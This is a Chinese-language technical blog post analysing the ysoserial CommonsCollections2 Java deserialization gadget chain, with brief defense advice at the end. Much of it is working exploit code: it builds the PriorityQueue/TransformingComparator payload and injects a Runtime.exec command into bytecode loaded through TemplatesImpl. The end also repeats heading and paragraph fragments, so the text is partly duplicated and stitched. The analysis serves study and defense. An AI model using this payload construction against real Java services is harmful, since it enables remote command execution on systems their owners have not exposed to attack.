Ysoserial CommonsCollections2 利用链深入分析<\/h1>

0x00 背景介绍<\/h2>
CommonsCollections2 是 ysoserial 工具中针对 Apache Commons Collections 库的一个利用链，它利用了 Java 反序列化漏洞来执行任意命令。本文将从技术角度深入分析这个利用链的构造原理和实现细节。<\/p>

0x01 Gadget Chain 分析<\/h2>
完整的利用链如下：<\/p>
ObjectInputStream.readObject()
    PriorityQueue.readObject()
        ...
        TransformingComparator.compare()
            InvokerTransformer.transform()
                Method.invoke()
                    Runtime.exec()
<\/code><\/pre>
0x02 关键组件分析<\/h2>
1. PriorityQueue 类<\/h3>
PriorityQueue 是 Java 中的一个优先级队列实现，它在反序列化时会触发排序操作：<\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span> 
<\/span><\/span>    throws<\/span> java.<\/span>io<\/span>.<\/span>IOException<\/span>,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ 读取基本信息和数组长度
<\/span><\/span><\/span><\/span>    s.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    s.<\/span>readInt<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 读取所有元素
<\/span><\/span><\/span><\/span>    queue =<\/span> new<\/span> Object[<\/span>size];<\/span>
<\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> size;<\/span> i++)<\/span>
<\/span><\/span>        queue[<\/span>i]<\/span> =<\/span> s.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 堆化操作（排序）
<\/span><\/span><\/span><\/span>    heapify();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>排序过程中会调用比较器：<\/p>
private<\/span> void<\/span> siftDownUsingComparator<\/span>(<\/span>int<\/span> k,<\/span> E x)<\/span> {<\/span>
<\/span><\/span>    int<\/span> half =<\/span> size >>><\/span> 1<\/span>;<\/span>
<\/span><\/span>    while<\/span> (<\/span>k <<\/span> half)<\/span> {<\/span>
<\/span><\/span>        int<\/span> child =<\/span> (<\/span>k <<<\/span> 1<\/span>)<\/span> +<\/span> 1<\/span>;<\/span>
<\/span><\/span>        Object c =<\/span> queue[<\/span>child];<\/span>
<\/span><\/span>        int<\/span> right =<\/span> child +<\/span> 1<\/span>;<\/span>
<\/span><\/span>        if<\/span> (<\/span>right <<\/span> size &&<\/span> comparator.<\/span>compare<\/span>((<\/span>E)<\/span> c,<\/span> (<\/span>E)<\/span> queue[<\/span>right])<\/span> ><\/span> 0<\/span>)<\/span>
<\/span><\/span>            c =<\/span> queue[<\/span>child =<\/span> right];<\/span>
<\/span><\/span>        if<\/span> (<\/span>comparator.<\/span>compare<\/span>(<\/span>x,<\/span> (<\/span>E)<\/span> c)<\/span> <=<\/span> 0<\/span>)<\/span>
<\/span><\/span>            break<\/span>;<\/span>
<\/span><\/span>        queue[<\/span>k]<\/span> =<\/span> c;<\/span>
<\/span><\/span>        k =<\/span> child;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    queue[<\/span>k]<\/span> =<\/span> x;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. TransformingComparator 比较器<\/h3>
这是 Apache Commons Collections 提供的一个比较器实现：<\/p>
public<\/span> int<\/span> compare<\/span>(<\/span>I obj1,<\/span> I obj2)<\/span> {<\/span>
<\/span><\/span>    O value1 =<\/span> this<\/span>.<\/span>transformer<\/span>.<\/span>transform<\/span>(<\/span>obj1);<\/span>
<\/span><\/span>    O value2 =<\/span> this<\/span>.<\/span>transformer<\/span>.<\/span>transform<\/span>(<\/span>obj2);<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>decorated<\/span>.<\/span>compare<\/span>(<\/span>value1,<\/span> value2);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. InvokerTransformer 转换器<\/h3>
这是实际执行方法调用的关键组件：<\/p>
public<\/span> O transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Class<?><\/span> cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>            Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>this<\/span>.<\/span>iMethodName<\/span>,<\/span> this<\/span>.<\/span>iParamTypes<\/span>);<\/span>
<\/span><\/span>            return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> this<\/span>.<\/span>iArgs<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>NoSuchMethodException var4)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> this<\/span>.<\/span>iMethodName<\/span> +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' does not exist"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IllegalAccessException var5)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> this<\/span>.<\/span>iMethodName<\/span> +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' cannot be accessed"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>InvocationTargetException var6)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> this<\/span>.<\/span>iMethodName<\/span> +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' threw an exception"<\/span>,<\/span> var6);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. TemplatesImpl 类<\/h3>
用于承载恶意字节码：<\/p>
public<\/span> synchronized<\/span> Transformer newTransformer<\/span>()<\/span> throws<\/span> TransformerConfigurationException {<\/span>
<\/span><\/span>    TransformerImpl transformer =<\/span> new<\/span> TransformerImpl(<\/span>
<\/span><\/span>        this<\/span>.<\/span>getTransletInstance<\/span>(),<\/span> \/\/ 关键调用
<\/span><\/span><\/span><\/span>        this<\/span>.<\/span>_outputProperties<\/span>,<\/span>
<\/span><\/span>        this<\/span>.<\/span>_indentNumber<\/span>,<\/span>
<\/span><\/span>        this<\/span>.<\/span>_tfactory<\/span>);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> Translet getTransletInstance<\/span>()<\/span> throws<\/span> TransformerConfigurationException {<\/span>
<\/span><\/span>    if<\/span> (<\/span>this<\/span>.<\/span>_class<\/span> ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>defineTransletClasses<\/span>();<\/span> \/\/ 定义类
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    AbstractTranslet translet =<\/span> (<\/span>AbstractTranslet)<\/span> this<\/span>.<\/span>_class<\/span>[<\/span>this<\/span>.<\/span>_transletIndex<\/span>].<\/span>newInstance<\/span>();<\/span> \/\/ 实例化触发代码执行
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x03 Payload 构造分析<\/h2>
完整的 payload 构造代码如下：<\/p>
public<\/span> Queue<<\/span>Object><\/span> getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 1. 创建包含恶意代码的 TemplatesImpl 对象
<\/span><\/span><\/span><\/span>    final<\/span> Object templates =<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>command);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 2. 初始化 InvokerTransformer，先设置为 toString 方法避免过早触发
<\/span><\/span><\/span><\/span>    final<\/span> InvokerTransformer transformer =<\/span> new<\/span> InvokerTransformer(<\/span>"toString"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>],<\/span> new<\/span> Object[<\/span>0<\/span>]);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 3. 创建 PriorityQueue 并设置 TransformingComparator 比较器
<\/span><\/span><\/span><\/span>    final<\/span> PriorityQueue<<\/span>Object><\/span> queue =<\/span> new<\/span> PriorityQueue<<\/span>Object>(<\/span>2<\/span>,<\/span> 
<\/span><\/span>        new<\/span> TransformingComparator(<\/span>transformer));<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 4. 添加两个占位元素
<\/span><\/span><\/span><\/span>    queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>    queue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 5. 通过反射修改 transformer 的方法名
<\/span><\/span><\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>transformer,<\/span> "iMethodName"<\/span>,<\/span> "newTransformer"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 6. 替换队列中的元素
<\/span><\/span><\/span><\/span>    final<\/span> Object[]<\/span> queueArray =<\/span> (<\/span>Object[])<\/span> Reflections.<\/span>getFieldValue<\/span>(<\/span>queue,<\/span> "queue"<\/span>);<\/span>
<\/span><\/span>    queueArray[<\/span>0<\/span>]<\/span> =<\/span> templates;<\/span>
<\/span><\/span>    queueArray[<\/span>1<\/span>]<\/span> =<\/span> 1<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> queue;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x04 关键问题解答<\/h2>
1. 为什么 queue 要先用两个 1 占位？<\/h3>
虽然最初的说法（比较器要求元素类型一致）不完全准确，但确实有以下几个考虑：<\/p>

避免过早触发<\/strong>：初始时 transformer 设置为调用 toString 方法，用基本类型 1 可以安全调用 toString<\/li>
类型兼容性<\/strong>：虽然最终会替换为 TemplatesImpl 对象，但初始时使用简单类型可以减少复杂度<\/li>
序列化兼容性<\/strong>：基本类型的序列化\/反序列化行为更加可预测<\/li>
<\/ol>
实际上，也可以直接放入 TemplatesImpl 对象和其他对象，如：<\/p>
queue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>new<\/span> VerifyError(<\/span>"nothing"<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>2. PriorityQueue 的 queue 字段使用 transient 修饰，为什么还能反序列化？<\/h3>
虽然 queue 字段被声明为 transient：<\/p>
transient<\/span> Object[]<\/span> queue;<\/span> \/\/ 非私有以简化嵌套类访问
<\/span><\/span><\/span><\/code><\/pre>但 PriorityQueue 实现了自定义的 writeObject 和 readObject 方法：<\/p>
private<\/span> void<\/span> writeObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectOutputStream<\/span> s)<\/span>
<\/span><\/span>    throws<\/span> java.<\/span>io<\/span>.<\/span>IOException<\/span> {<\/span>
<\/span><\/span>    s.<\/span>defaultWriteObject<\/span>();<\/span>
<\/span><\/span>    s.<\/span>writeInt<\/span>(<\/span>Math.<\/span>max<\/span>(<\/span>2<\/span>,<\/span> size +<\/span> 1<\/span>));<\/span>
<\/span><\/span>    \/\/ 显式写入队列元素
<\/span><\/span><\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> size;<\/span> i++)<\/span>
<\/span><\/span>        s.<\/span>writeObject<\/span>(<\/span>queue[<\/span>i]);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span>
<\/span><\/span>    throws<\/span> java.<\/span>io<\/span>.<\/span>IOException<\/span>,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    s.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    s.<\/span>readInt<\/span>();<\/span>
<\/span><\/span>    queue =<\/span> new<\/span> Object[<\/span>size];<\/span>
<\/span><\/span>    \/\/ 显式读取队列元素
<\/span><\/span><\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> size;<\/span> i++)<\/span>
<\/span><\/span>        queue[<\/span>i]<\/span> =<\/span> s.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    heapify();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>这是 Java 序列化机制允许的，通过实现 writeObject\/readObject 方法可以完全控制对象的序列化行为，即使字段被标记为 transient。<\/p>
0x05 执行流程详解<\/h2>

反序列化触发<\/strong>：ObjectInputStream 读取 PriorityQueue 的序列化数据<\/li>
readObject 调用<\/strong>：PriorityQueue 的 readObject 方法被调用<\/li>
元素读取<\/strong>：从流中读取所有元素到 queue 数组<\/li>
堆化排序<\/strong>：heapify() 方法触发排序操作<\/li>
比较器调用<\/strong>：排序过程中调用 TransformingComparator.compare()<\/li>
转换器执行<\/strong>：比较器调用 InvokerTransformer.transform()<\/li>
方法反射调用<\/strong>：transform() 方法通过反射调用 TemplatesImpl.newTransformer()<\/li>
字节码加载<\/strong>：newTransformer() 触发字节码加载和实例化<\/li>
静态代码执行<\/strong>：恶意类的静态初始化块中的代码被执行<\/li>
命令执行<\/strong>：最终触发 Runtime.exec() 执行任意命令<\/li>
<\/ol>
0x06 恶意字节码生成<\/h2>
Gadgets.createTemplatesImpl() 方法使用 Javassist 修改字节码：<\/p>
public<\/span> static<\/span> <<\/span>T><\/span> T createTemplatesImpl<\/span>(<\/span>final<\/span> String command,<\/span> 
<\/span><\/span>    Class<<\/span>T><\/span> tplClass,<\/span> Class<?><\/span> abstTranslet,<\/span> Class<?><\/span> transFactory)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    
<\/span><\/span>    final<\/span> T templates =<\/span> tplClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 使用 Javassist 修改字节码
<\/span><\/span><\/span><\/span>    ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>    pool.<\/span>insertClassPath<\/span>(<\/span>new<\/span> ClassClassPath(<\/span>StubTransletPayload.<\/span>class<\/span>));<\/span>
<\/span><\/span>    pool.<\/span>insertClassPath<\/span>(<\/span>new<\/span> ClassClassPath(<\/span>abstTranslet));<\/span>
<\/span><\/span>    
<\/span><\/span>    final<\/span> CtClass clazz =<\/span> pool.<\/span>get<\/span>(<\/span>StubTransletPayload.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 在静态初始化块中插入命令执行代码
<\/span><\/span><\/span><\/span>    String cmd =<\/span> "java.lang.Runtime.getRuntime().exec(\""<\/span> +<\/span> 
<\/span><\/span>        command.<\/span>replaceAll<\/span>(<\/span>"\\\\"<\/span>,<\/span> "\\\\\\\\"<\/span>).<\/span>replaceAll<\/span>(<\/span>"\""<\/span>,<\/span> "\\\\\""<\/span>)<\/span> +<\/span> "\");"<\/span>;<\/span>
<\/span><\/span>    clazz.<\/span>makeClassInitializer<\/span>().<\/span>insertAfter<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>    
<\/span><\/span>    clazz.<\/span>setName<\/span>(<\/span>"ysoserial.Pwner"<\/span> +<\/span> System.<\/span>nanoTime<\/span>());<\/span>
<\/span><\/span>    CtClass superC =<\/span> pool.<\/span>get<\/span>(<\/span>abstTranslet.<\/span>getName<\/span>());<\/span>
<\/span><\/span>    clazz.<\/span>setSuperclass<\/span>(<\/span>superC);<\/span>
<\/span><\/span>    
<\/span><\/span>    final<\/span> byte<\/span>[]<\/span> classBytes =<\/span> clazz.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 将恶意字节码设置到 TemplatesImpl 中
<\/span><\/span><\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]<\/span> {<\/span>classBytes});<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "Pwnr"<\/span>);<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> transFactory.<\/span>newInstance<\/span>());<\/span>
<\/span><\/span>    
<\/span><\/span>    return<\/span> templates;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x07 防御建议<\/h2>

升级 Commons Collections<\/strong>：使用最新版本（4.0+）<\/li>
反序列化过滤<\/strong>：使用反序列化过滤器或白名单<\/li>
JEP 290<\/strong>：启用 Java 的序列化过滤器机制<\/li>
代码审计<\/strong>：检查所有反序列化操作点<\/li>
使用替代方案<\/strong>：考虑使用 JSON 等更安全的序列化格式<\/li>
<\/ol>
0x08 总结<\/h2>
CommonsCollections2 利用链通过精心构造的 PriorityQueue 对象，在反序列化时触发一系列方法调用，最终实现任意命令执行。理解这个利用链需要掌握：<\/p>

Java 序列化\/反序列化机制<\/li>
PriorityQueue 的内部工作原理<\/li>
反射和动态方法调用<\/li>
字节码修改和加载机制<\/li>
Java 安全机制和绕过方法<\/li>
<\/ol>
通过深入分析这个利用链，可以帮助我们更好地理解 Java 反序列化漏洞的本质，并采取更有效的防御措施。<\/p>
Ysoserial CommonsCollections2 利用链深入分析<\/h1>

0x00 背景介绍<\/h2> CommonsCollections2 是 ysoserial 工具中针对 Apache Commons Collections 库的一个利用链，它利用了 Java 反序列化漏洞来执行任意命令。本文将从技术角度深入分析这个利用链的构造原理和实现细节。<\/p>

0x02 关键组件分析<\/h2>

0x04 关键问题解答<\/h2>

0x00 背景介绍<\/h2>
CommonsCollections2 是 ysoserial 工具中针对 Apache Commons Collections 库的一个利用链，它利用了 Java 反序列化漏洞来执行任意命令。本文将从技术角度深入分析这个利用链的构造原理和实现细节。<\/p>
